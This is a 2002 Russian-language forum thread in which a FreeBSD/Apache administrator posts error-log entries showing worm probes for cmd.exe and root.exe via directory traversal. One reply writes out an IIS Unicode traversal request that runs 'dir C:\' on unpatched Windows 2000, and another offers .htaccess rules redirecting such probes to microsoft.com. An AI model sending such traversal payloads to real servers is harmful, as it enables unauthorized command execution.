Новые ответы

httpd-error.log, что бы это значило?,

Nick, 26-Дек-02, 13:36 [смотреть все]

сабж.
[Thu Dec 26 11:43:59 2002] [error] [client 213.59.92.43] File does not exist: /www/scripts/root.exe
[Thu Dec 26 11:44:03 2002] [error] [client 213.59.92.43] File does not exist: /www/MSADC/root.exe
[Thu Dec 26 11:44:07 2002] [error] [client 213.59.92.43] File does not exist: /www/c/winnt/system32/cmd.exe
[Thu Dec 26 11:44:18 2002] [error] [client 213.59.92.43] File does not exist: /www/d/winnt/system32/cmd.exe
[Thu Dec 26 11:44:23 2002] [error] [client 213.59.92.43] File does not exist: /www/scripts/..\../winnt/system32/cmd.exe
[Thu Dec 26 11:44:27 2002] [error] [client 213.59.92.43] File does not exist: /www/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe
[Thu Dec 26 11:44:31 2002] [error] [client 213.59.92.43] File does not exist: /www/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe
[Thu Dec 26 14:08:54 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/root.exe
[Thu Dec 26 14:09:00 2002] [error] [client 213.29.75.3] File does not exist: /www/MSADC/root.exe
[Thu Dec 26 14:09:06 2002] [error] [client 213.29.75.3] File does not exist: /www/c/winnt/system32/cmd.exe
[Thu Dec 26 14:09:16 2002] [error] [client 213.29.75.3] File does not exist: /www/d/winnt/system32/cmd.exe
[Thu Dec 26 14:09:20 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..\../winnt/system32/cmd.exe
[Thu Dec 26 14:09:25 2002] [error] [client 213.29.75.3] File does not exist: /www/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe
[Thu Dec 26 14:09:29 2002] [error] [client 213.29.75.3] File does not exist: /www/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe
[Thu Dec 26 14:09:34 2002] [error] [client 213.29.75.3] File does not exist: /www/msadc/..\../..\../..\/..+../..+../..+../winnt/system32/cmd.exe
[Thu Dec 26 14:09:44 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..+../winnt/system32/cmd.exe
[Thu Dec 26 14:09:49 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..Lп../winnt/system32/cmd.exe
[Thu Dec 26 14:09:53 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..+Ь../winnt/system32/cmd.exe
[Thu Dec 26 14:10:03 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..\../winnt/system32/cmd.exe
[Thu Dec 26 14:10:05 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/../../winnt/system32/cmd.exe

хакеры атакуют? %)
PS: система - FreeBSD, Apache 1.3

Ответить | Сообщить модератору

RE: httpd-error.log, что бы это значило?, Dima, 14:14 , 26-Дек-02 (1)
Да есть такое дело %)
при не патченом W2K от codeRed
при помощи простого запроса можно увидить чудную картинку
OPTIONS * HTTP\1.1
GET /scripts/..%5c..%5cWINNT/SYSTEM32/cmd.exe?/c+dir+C:\ HTTP/1.1
HOST: host.com
%)
Ответить | Сообщить модератору
RE: httpd-error.log, что бы это значило?, Nikola_SPb, 02:50 , 27-Дек-02 (2)
Меня уже полностью достали эти сетевые вирусы. Я еще могу понять, когда атаке или прощупыванию подвергается сервер, но когда атакуется уже твой домашний компьютер - это уже слишком. У меня дома постоянный Интернет. Так вот, в среднем я нахожу у себя в логах домашнего апача до сотни запросов произведенных вирусами.
А для хостинга это еще и прямой денежный убыток. Так как вы, как владелец сайта, вынуждены оплачивать трафик, производимый вирусами. А прямой виновник этого торжества Microsoft - даже и не чешется.
Надоело. Итак, давайте, защитим наш сайт от грязных посягательств не чистых запросов.
Вы используете .htaccess ? Если нет, то настало время. Создайте этот файл в корневой директории вашего вэб сайта и внесите туда следующие строки:
redirect /_vti_bin http://www.microsoft.com
redirect /scripts http://www.microsoft.com
redirect /MSADC http://www.microsoft.com
redirect /c http://www.microsoft.com
redirect /d http://www.microsoft.com
redirect /_mem_bin http://www.microsoft.com
redirect /msadc http://www.microsoft.com
RedirectMatch (.*)\cmd.exe$ http://www.microsoft.com$1

теперь практически все запросы от вирусов будут автоматически перенаправляться на сайт www.microsoft.com
Мы выигрываем на трафике и чистых логах, а микрософт получает свое родное.
Да, в дополнение. Способ проверен и работает для вэб сервера apache. Zeus тоже вроде должен понимать. Ну а IIS - проблема микрософта.
Ответить | Сообщить модератору

RE: httpd-error.log, что бы это значило?, Nikola_SPb, 02:54 , 27-Дек-02 (3)
P.S. Копирайт мне не известен.
Ответить | Сообщить модератору